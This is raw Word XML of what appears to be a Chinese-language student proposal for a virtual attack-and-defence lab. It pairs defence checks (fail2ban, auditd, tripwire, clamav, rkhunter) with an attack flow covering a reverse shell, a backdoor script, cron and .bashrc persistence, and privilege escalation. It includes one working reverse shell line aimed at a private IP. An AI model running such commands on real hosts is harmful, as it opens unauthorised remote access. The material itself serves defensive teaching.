          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>超過 5 次 → 應被封鎖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE2E2D6" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E24FD30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防禦驗證 2：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 偵測後門行為</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C120549" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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追蹤反向 shell 執行（如 /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>, /bin/bash）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A619C1B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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DAEA8CD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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>auditctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>always,exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> -F arch=b64 -S </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> -k suspicious-exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708E9703" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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模擬攻擊行為：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944466D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bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>/192.168.1.1/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E92A6" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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查詢記錄：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CB5FB" w14:textId="77777777" w:rsidR="00C91422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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>ausearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> -k suspicious-exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBE498F" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1218B198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延伸設計與攻防整合</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="643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9"/>
        <w:gridCol w:w="4300"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="25EF51F1" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5861C200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防禦工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="395C532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功能與對應行為</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="6D28AFE7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="692762A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tripwire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="270104F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比對入侵前後的檔案異動</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="4358329B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CF11CE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clamav</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58EE26E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偵測下載後門檔案、每日自動掃描</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="25917956" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="299A3C5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rkhunter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D0A0C9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偵測 rootkit、異常服務、後門行為</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="4109206E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58E89D7A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MITRE ATT&amp;CK 映射</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4300" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EEE24DD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技術對應：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:br/>
              <w:t>T1059.004 - Unix Shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:br/>
              <w:t>T1053.003 - Cron</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:br/>
              <w:t>→ 實驗設計可與防禦策略對應技術分類</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="162DF667" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C528A1B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展示建議：雙視角呈現攻防過程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058932F6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攻擊流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74B24C" w14:textId="77777777" w:rsidR="00C91422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反向 shell 成功連線（如 bash /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E910E2" w14:textId="77777777" w:rsidR="00C91422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上傳並執行 backdoor.sh 後門</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763990EE" w14:textId="77777777" w:rsidR="00C91422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建立開機自動啟動</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>bashrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1979EAB5" w14:textId="77777777" w:rsidR="00C91422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嘗試提權</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>，存取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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752DD91F" w14:textId="77777777" w:rsidR="00C91422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防禦驗證</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF8361" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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fail2ban 阻擋 SSH 爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519009A9" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:num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auditd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 偵測 /bin/bash 執行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF881D" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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tripwire 偵測敏感檔案被竄改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA593B5" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:num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lastRenderedPageBreak/>
        <w:t>logwatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 每日彙整異常行為通報</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1420520F" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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firewall 封鎖未授權 port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F8D1FB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七、工作分配與預定進度甘梯圖</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="761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5"/>
        <w:gridCol w:w="1280"/>
        <w:gridCol w:w="801"/>
        <w:gridCol w:w="2705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="7E28D16B" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="029C5D6F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工作項目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43B9173B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完成時間</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="801" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EBD1D36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負責人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="281664E1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備註</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="1AA69905" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EF6F339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  <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="af5"/>
              <w:tblW w:w="9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6"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="7223F0E4" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="96" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="62DDCD90" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="67DD4406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6"/>
              <w:tblW w:w="273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730"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="235CF1B9" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2730" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2E879B48" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                    <w:t>虛擬環境建置與測試網路</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3FB21482" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DC991F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801" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28F0DF2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2705" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BACFC9C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7"/>
              <w:tblW w:w="9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6"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="6B703085" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="96" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="7663BDAB" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4A0251A1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8"/>
              <w:tblW w:w="261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610"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="3867AEFA" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2610" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="56027C4E" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                    <w:t>完成NAT設定與IP對應</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7CB08336" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="0E48A515" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04490599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9"/>
              <w:tblW w:w="9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6"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="43598AB2" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="96" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="00687B94" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="5D2AB5C4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a"/>
              <w:tblW w:w="249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490"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="78D034F9" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2490" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="4A8C0608" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                    <w:t>Shell 腳本撰寫與測試</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="668D2D04" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5104D65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801" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="419F5997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2705" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="193CC01D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b"/>
              <w:tblW w:w="9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6"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="6282005F" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="96" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="4AA2CC3C" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="30552FE7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c"/>
              <w:tblW w:w="165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1650"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="6D149840" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1650" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="4F1B8044" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                    <w:t>包含 bash、</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                    <w:t>nc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4A21D080" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="1C7B4FA5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13F1BD4C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滲透流程操作與記錄</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BF7B599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801" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28FE6FC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2705" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4412B37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攻擊與權限提取</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="71DF6165" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41AB3300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d"/>
              <w:tblW w:w="96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96"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="572B94C5" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="96" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="5FD05A78" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
                  <w:pPr>
                    <w:rPr>
